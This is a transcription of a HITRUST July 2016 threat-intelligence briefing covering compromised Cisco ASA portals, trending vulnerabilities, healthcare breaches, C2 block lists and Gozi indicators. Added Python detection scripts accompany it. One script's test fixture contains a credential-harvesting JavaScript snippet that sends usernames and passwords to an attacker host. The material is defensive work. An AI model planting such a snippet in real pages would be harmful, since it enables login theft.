Monthly Cyber Threat Briefing July 2016
Transcription
855.HITRUST (855.448.7878) www.HITRUSTAlliance.net © 2016 HITRUST Alliance. All Rights Reserved.

Presenters
• US-CERT: Majed Oweis, CISCP Analyst
• Armor: Charity Willhoite, Intelligence Analyst
• Trend Micro: Steve Duncan, Product Management
• Anomali: Matthew Wollenweber, Sr. Research Engineer
• HITRUST: Talha Hasan, Jr. Information Security Analyst

NCCIC/US-CERT REPORT

TLP: GREEN – AR-16-20150 – Network Analysis Report (AR) on Compromised Cisco ASA Devices
• Analysis conducted by the DHS US-CERT Network and Einstein Analytics Team.
• Malicious actors are suspected of having leveraged the vulnerability cited in CVE-2014-3393 to inject malicious code into affected appliances.
• Affected Cisco ASA software versions are listed in the analysis report.
• The analysis includes information about JavaScript code found in the copyright panel of affected devices. The purpose of the code appears to be credential harvesting.
• The same code, under a different name, has been seen on GitHub.

TLP: GREEN – AR-16-20150 – Network Analysis Report on Compromised Cisco ASA Devices (continued)
• Similar activity redirected to https[:]//www[.]dreamscap[.]com/jquery.js.
• The code at "dreamscap" appeared similar to the code found on GitHub.
• Both included an object called "x" with values for name, version and author.
• In the object "x" at the "dreamscap" site the author value had been deleted, and the comments about the code were absent. The "dreamscap" site also included a URL to another resource, logon.php.
• Recommended mitigations and references describing the vulnerability are included in the AR.
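The indicators above (a jquery.js pulled from an external host, an object "x" with name/version/author members, a logon.php resource) lend themselves to a quick integrity check of a captured portal login page. The following is an added example, not code from the US-CERT report or from Cisco: it parses a saved copy of a Clientless SSL VPN portal page, flags any script loaded from a host other than the appliance itself (with a stronger finding for the dreamscap host named in the AR), and looks for the inline traits the report describes. The two sample pages and the hostname vpn.example.org are constructed.

```python
"""Audit a captured Cisco ASA Clientless SSL VPN portal page for the
injection described in AR-16-20150: script pulled from an external host
(the report names www[.]dreamscap[.]com/jquery.js), an inline object "x"
carrying name/version metadata, and a reference to logon.php.

Added example, not code from the US-CERT report. The two portal pages
below are constructed; the only real indicator is the dreamscap host.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator from the AR, kept defanged in the source and refanged here.
KNOWN_BAD_HOSTS = {h.replace("[.]", ".") for h in ["www[.]dreamscap[.]com"]}

# Inline-script traits the AR describes: an object literal assigned to "x"
# with name and version members, and a logon.php resource.
OBJECT_X_RE = re.compile(r"\bx\s*=\s*\{[^}]*\bname\b[^}]*\bversion\b", re.S)
LOGON_PHP_RE = re.compile(r"logon\.php", re.I)


class _ScriptCollector(HTMLParser):
    """Collect external script sources and the text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src="...">
        self.inline = []     # one string per inline <script> block
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_portal_page(html, device_host):
    """Return findings for one portal page fetched from device_host.

    The stock portal serves its own scripts, so any script loaded from a
    host other than the appliance is reported, with a stronger finding
    when the host is on the known-bad list.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:                     # relative path: served by the ASA
            continue
        host = host.lower()
        if host in KNOWN_BAD_HOSTS:
            findings.append(f"script loaded from known-bad host {host}: {src}")
        elif host != device_host.lower():
            findings.append(f"script loaded from external host {host}: {src}")
    for body in parser.inline:
        if OBJECT_X_RE.search(body):
            findings.append("inline script defines object x with name/version metadata")
        if LOGON_PHP_RE.search(body):
            findings.append("inline script references logon.php")
    return findings


# Constructed samples: a stock-looking page and one with the injected panel.
CLEAN_PAGE = """<html><body>
<script src="/portal/login.js"></script>
<div id="copyright">Copyright (c) 2006-2014 by Cisco Systems, Inc.</div>
</body></html>"""

COMPROMISED_PAGE = """<html><body>
<script src="/portal/login.js"></script>
<div id="copyright">Copyright (c) 2006-2014 by Cisco Systems, Inc.
<script src="https://www.dreamscap.com/jquery.js"></script>
<script>
var x = {name: "jquery", version: "1.8.3"};
function grab(f) {
  new Image().src = "https://www.dreamscap.com/logon.php?u=" + f.username.value + "&p=" + f.password.value;
}
</script>
</div>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("compromised", COMPROMISED_PAGE)):
        print(label, audit_portal_page(page, "vpn.example.org") or ["no findings"])
```

Run it against a page saved from the appliance with the hostname you fetched it from; a relative script path is treated as the appliance's own content, while a protocol-relative or absolute URL to any other host is reported even when the host is not yet on a block list.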
Report location:
• TLP: GREEN – AR-16-20150 – https://portal.us-cert.gov/documents/70338/108826/AR-16-20150/1619fa49-08d3-4c49-b6ea-17fb2e9d35ce
Other resources:
• https://tools.cisco.com/security/center/viewAlert.x?alertId=35917
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3393
• https://www.cvedetails.com/cve/CVE-2014-3393/
• https://www.iad.gov/iad/library/ia-advisories-alerts/recommendations-to-mitigate-unauthorized-cisco-rommon-access-and-validate-bootroms.cfm

Questions? Comments?
Contact US-CERT at:
• Email: soc@us-cert.gov
• Phone: 1-888-282-0870
• Website: www.us-cert.gov
Contact CISCP at: CISCP@us-cert.gov

Top Threat Trends and Defenses
ARMOR

Trending Vulnerabilities
NAME | RISK SCORE | FIRST SEEN | RELATED TECH
CVE-2016-0189 | 7.6/10.0 Critical | 6/9/16 | The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products
CVE-2015-8651 | 9.3/10.0 High | 12/2/15 | Adobe Flash Player, Adobe, Angler Exploit Kit, Neutrino Exploit Kit, Antiy Labs
CVE-2016-2208 | 9.4/10.0 Critical | 5/19/16 | Symantec AV Engine 20151.1.1.4
SRSsoft | N/A | 5/16 | SRS EHR (all versions) – all clients exploitable
PilotFish Technologies | N/A | 7/16 | PilotFish EHR integration – all clients exploitable
Action Items:
• Effectively and immediately patch vulnerabilities according to vendor and NIST recommendations: https://web.nvd.nist.gov
• Practices using SRSsoft EHR software should disable access from remote support accounts to their networks. RDP access from the internet should be disabled. Replace it with an alternative solution until a patch is released.
• PilotFish EHR integration clients should activate incident response teams and contact PilotFish immediately.

Additional Details – CVE-2016-0189 EK IOCs
Locky Affid 13:
• Malware hash (SHA-256): 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18
Sundown EK:
• Hash (SHA-256): 61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1
• IP: 185.93.185.224
• Domain: vicolavicolom.com

Top Emerging Malware
NAME | CATEGORY | RELATED TECH, INDUSTRIES, INDICATORS
Conficker | Botnet, Worm, Trojan, Ransomware | MS Windows, XP, Windows 7
Tinba (aka Tiny Banker or Zusy) | Trojan, Virus, Web-inject | MS Windows, banking websites, banking apps, Gamarue bot
Sality | Virus | MS Windows
Action Items:
• Preserve your data: frequent data backups!
• Security awareness: do not download untrusted apps on mobile devices; update Windows often!

Top US Healthcare Targets: June – July 2016
Name of Entity | Individuals Affected | Breach Submission Date | Type of Breach | Location of Breached Information
Laser & Dermatologic Surgery Center | 31,000 | 6/14/2016 | Hacking/IT Incident | Network Server
Uncommon Care, P.A. | 13,674 | 6/21/2016 | Hacking/IT Incident | Network Server
Grace Primary Care, PC | 6,853 | 6/7/2016 | Hacking/IT Incident | Network Server
Allergy, Asthma & Immunology of the Rockies, PC | 6,851 | 6/17/2016 | Hacking/IT Incident | Network Server
Massachusetts General Hospital | 4,293 | 6/29/2016 | Hacking/IT Incident | Network Server
The Vein Doctor | 3,000 | 6/3/2016 | Hacking/IT Incident | Electronic Medical Record, Network Server
My Pediatrician, PA | 2,500 | 6/1/2016 | Hacking/IT Incident | Network Server
Vincent Vein Center | 2,250 | 6/7/2016 | Hacking/IT Incident | Electronic Medical Record
Blaine Chiropractic Center | 1,945 | 7/14/2016 | Hacking/IT Incident | Network Server
Health Incent, LLC | 1,100 | 7/11/2016 | Hacking/IT Incident | Other

Emerging Threats: IP Block List
IP Address | Risk Score | Malware | Behavior Observed
185.106.122.38 | 99% | Ransomware C&C IP |
51.255.172.55 | 96% | Ransomware C&C IP |
199.59.243.120 | 94% | C&C IP | Botnet
141.8.224.93 | 93% | C&C IP | Zeus Botnet C2
185.146.169.16 | 93% | Ransomware C&C IP |
5.187.0.137 | 93% | Ransomware C&C IP |
54.72.130.67 | 93% | C&C IP |
62.149.128.154 | 93% | C&C IP | Spamming, Phishing, DDoS
75.99.13.124 | 93% | C&C IP | Dridex Botnet C2
100.7.41.35 | 92% | Malware C&C IP | DarkComet C2, Malware
107.23.198.240 | 92% | C&C IP |
Behavior Observed entry whose row is not recoverable from the slide: Locky C2 IP, Neutrino EK

The Value of Records: The Darkoverlord Case Study
TREND MICRO

Background
• Zero-day exploit in Remote Desktop Protocol
  – Only specific to some orgs using RDP
• Extortion mails to affected orgs went unanswered
• Darkoverlord turned to TheRealDeal marketplace to sell the records
Records Compromised
• 689,621 patient records
  – Separate databases:
    • Farmington, Missouri MS Access database: 48,000 patients
    • Atlanta, Georgia internal network: 397k medical records
    • Central/Midwest misconfigured network: 210k records
  – Full data: full names with full addresses, Social Security numbers, DOB, phone, gender, insurance ID
  – 151 to 643 BTC ($96k to $411k)
• Another possible 9.3 million records
  – 750 BTC ($478k)

So what is the value?
• Privacy Rights Clearinghouse data survey
  – Medical records: $82.90
  – Social Security: $55.70
  – Payment details: $45.10
  – Physical location information: $38.40
  – Marital status: $6.10
  – Name and gender: $2.90

Where will it end up?
• Bitglass experiment phase I
  – 1,500 fake records with a secret watermark put on the market
  – In 12 days:
    • 1,100 clicks, 47 downloads
    • Data shared in 22 countries, 5 continents
    • 2 cybercrime syndicates from Russia and Nigeria
• Bitglass phase II
  – Fake credentials
  – In 24 hours:
    • 5 bank logins
    • 3 online storage break-ins
    • 94% uncovered other accounts

Why?
• Persistence of data forms
• Mischief in the victim's name:
  – Opening new lines of credit
  – Phony tax claims
  – Etc.
Requirements to address the problem
• Detection: identify and block spear-phishing emails that are often part of the initial phase of a targeted attack or ransomware campaign
• Interoperability: work seamlessly with an existing spam filter or secure email gateway to detect spear-phishing emails that may contain advanced malware, including ransomware
• ROI: low cost of acquisition and tangible benefits from avoiding the costs and risks of targeted and ransomware attacks

GOZI DETECTED VIA CTX
ANOMALI

Overview:
• On June 8th 2016, HITRUST CTX partners began automatically reporting domains associated with Gozi
  o What is the CTX
  o What is Gozi

Anomali_trend Connector + HITRUST CTX

Gozi Domain: magasoldator[.]ru
This known Gozi/URSNIF/ISFB domain was observed and reported via the HITRUST CTX

What is Gozi ISFB?
• Gozi (also called URSNIF and ISFB) is a banking trojan that was first reported circa 2008
• Commonly dropped via Pony, but also known to spread via phishing
• Blocks AV products and Microsoft updates
• Injects into common browsers to collect banking information
• Exfiltrates data using long, random-looking URLs that are often labeled as images
• This variant uses fast-flux techniques
• Source code leaked in April 2016

Participating in HITRUST
• https://hitrustalliance.net/ctx-registration/

Strategies for Mitigating Gozi
• Endpoint AV
• Network protection: URL filtering and email sandboxing
• Detection via correlating with threat intelligence sent to IDS, NGFW, or SIEM
• Detecting file mismatch (Gozi URLs look like images but aren't)
• High entropy in URL strings (will be noisy)

For More Information
Name | Email
Matthew Wollenweber | mjw@anomali.com
Anomali Support / Info Requests | support@anomali.com

Useful Links
• https://hitrustalliance.net/documents/cyber_intel/CTX/HiTrustCTXROIPresentation.pdf
• https://hitrustalliance.net/hitrust-pilot-advances-health-industry-cyber-threat-sharing-combat-ransomware-cyberattacks
• https://github.com/gbrindisi/malware
• https://ui.threatstream.com/search?status=active&value__re=.*ursnif.*
• https://ui.threatstream.com/search?status=active&value__re=.*magasoldator.ru.*
• https://ui.threatstream.com/search?status=active&value__re=.*ISFB.*
• https://api.threatstream.com/api/v1/myattacks/
• http://www.threatgeek.com/2016/06/new-ursnif-variant-targeting-italy-and-us.html
• https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/
• https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature
• https://www.secureworks.com/research/gozi
• https://www.secureworks.com/research/banking-botnets-the-battle-continues
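The last two mitigation bullets (image URLs whose body is not an image, high entropy in URL strings) and the magasoldator[.]ru domain reported via the CTX can be turned into a small proxy-log triage rule. Here is an added example, not Anomali's or HITRUST's code, run against constructed proxy records. The entropy threshold of 4.0 bits per character and the 40-character minimum path length are tuning assumptions, and the third record shows the noise the slide warns about: a legitimate content-hashed CDN asset also trips the entropy rule, which is why it is best used as a correlation signal rather than a block rule.

```python
"""Flag Gozi/ISFB-style beaconing in web proxy records using the two
heuristics from the mitigation slide (image URLs whose body is not an
image; long, high-entropy URL paths) plus a match on the Gozi domain
reported via the CTX.

Added example, not Anomali's or HITRUST's code. The proxy records are
constructed; the only real indicator is magasoldator[.]ru. The entropy
threshold and minimum length are tuning assumptions.
"""
import math
from urllib.parse import urlparse

# Indicator from the briefing, defanged on the slide and refanged here.
GOZI_DOMAINS = {d.replace("[.]", ".") for d in ["magasoldator[.]ru"]}

IMAGE_EXTENSIONS = (".gif", ".jpg", ".jpeg", ".png", ".bmp")

# Leading bytes a genuine image of the claimed types would start with.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"BM")

ENTROPY_THRESHOLD = 4.0   # bits per character (assumed tuning value)
MIN_PATH_CHARS = 40       # short paths carry too little signal (assumed)


def shannon_entropy(text):
    """Shannon entropy of a string in bits per character."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def claims_to_be_image(path, content_type):
    return path.lower().endswith(IMAGE_EXTENSIONS) or content_type.lower().startswith("image/")


def body_is_image(body_prefix):
    return any(body_prefix.startswith(magic) for magic in IMAGE_MAGIC)


def classify(record):
    """Return the list of reasons a proxy record looks like Gozi traffic.

    record: {"url": str, "content_type": str, "body_prefix": bytes}
    An empty list means nothing fired.
    """
    url = urlparse(record["url"])
    host = (url.hostname or "").lower()
    reasons = []
    if host in GOZI_DOMAINS:
        reasons.append("known Gozi domain")
    if claims_to_be_image(url.path, record["content_type"]) and not body_is_image(record["body_prefix"]):
        reasons.append("claims image but body is not an image")
    # Gozi carries the stolen data in the path itself, so measure the whole
    # path with its separators removed rather than the last segment alone.
    chars = "".join(ch for ch in url.path if ch not in "/.")
    if len(chars) >= MIN_PATH_CHARS:
        h = shannon_entropy(chars)
        if h >= ENTROPY_THRESHOLD:
            reasons.append(f"high-entropy path ({h:.2f} bits/char)")
    return reasons


# Constructed proxy records: a normal image, a Gozi-style beacon, and a
# legitimate hashed CDN asset that shows why the entropy rule is noisy.
RECORDS = [
    {"url": "http://www.example.org/images/logo.png",
     "content_type": "image/png",
     "body_prefix": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"},
    {"url": "http://magasoldator.ru/images/aB3dE5fG7hI9jK1l/M2nO4pQ6rS8tU0vW/xYzAcCeFgHiJkLmN/oPqRsTuVwXyZ.gif",
     "content_type": "image/gif",
     "body_prefix": b"\x83\x1f\x05\xa2\x00\x00\x00\x10"},
    {"url": "http://cdn.example.org/static/app.3f9a1c7b2e4d6f8a9b0c1d2e3f4a5b6c7d8e9f0a.js",
     "content_type": "application/javascript",
     "body_prefix": b"!function(e){"},
]

if __name__ == "__main__":
    for rec in RECORDS:
        print(rec["url"], "->", classify(rec) or ["clean"])
```

The magic-byte check is the one that catches the "image that isn't" case regardless of what Content-Type the server sets; the entropy rule needs the body only for context and is the component to feed into a SIEM for correlation with the domain list rather than to alert on alone.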
Indicators Associated with this Botnet
• magasoldator[.]ru
• bangoteensdab[.]ru
• germandartisor[.]ru
• 868801075c90864b6dbb54c661fe690d9e1d130e (SHA-1)
• gashikbarango[.]ru
• f59528d8cf4090cf3e2d634059f0ff03a1e10e52 (SHA-1)
• beeengootrator[.]ru
• 175a7e9d34c625da059d8505a6c51ccb (MD5)
• ebankistragira[.]ru
• magamedpatygoose[.]ru
• majahedislampork[.]ru
• maxidorkivast[.]ru
• 6af7e41e10ef6a7e075cb82d844810377b9fbb08 (SHA-1)
• 329b50acf49900b51e7870ae27eb458c2cb9e00b (SHA-1)

Threat Correlation to CSF
HITRUST

CSF Controls Related to Threats
CSF Control for Vulnerability Patching
• Control Reference: 10.m Control of Technical Vulnerabilities
  – Control Text: Timely information about technical vulnerabilities of systems being used shall be obtained; the organization's exposure to such vulnerabilities evaluated; and appropriate measures taken to address the associated risk.
  – Implementation Requirement: Specific information needed to support technical vulnerability management includes the software vendor, version numbers, current state of deployment (e.g., what software is installed on what systems) and the person(s) within
    Appropriate, timely action shall be taken in response to the identification of potential technical vulnerabilities. Once a potential technical vulnerability has been identified, the organization shall identify the associated risks and the actions to be taken. Such action shall involve patching of vulnerable systems and/or applying other controls.

CSF Controls Related to Threats
CSF Control for Emerging Threats/IP Block List
• Control Reference: 01.i Policy on the Use of Network Services
  – Control Text: Users shall only be provided access to internal and external network services that they have been specifically authorized to use. Authentication and authorization mechanisms shall be applied to users and equipment.
  – Implementation Requirement: The organization shall specify the networks and network services to which users are authorized access.

CSF Controls Related to Threats
CSF Control for Top Emerging Malware
• Control Reference: 09.j Controls Against Malicious Code
  – Control Text: Detection, prevention, and recovery controls shall be implemented to protect against malicious code, and appropriate user awareness procedures on malicious code shall be provided.
  – Implementation Requirement: Protection against malicious code shall be based on malicious code detection and repair software, security awareness, and appropriate system access and change management controls.

QUESTIONS?

Visit www.HITRUSTAlliance.net for more information
To view our latest documents, visit the Content Spotlight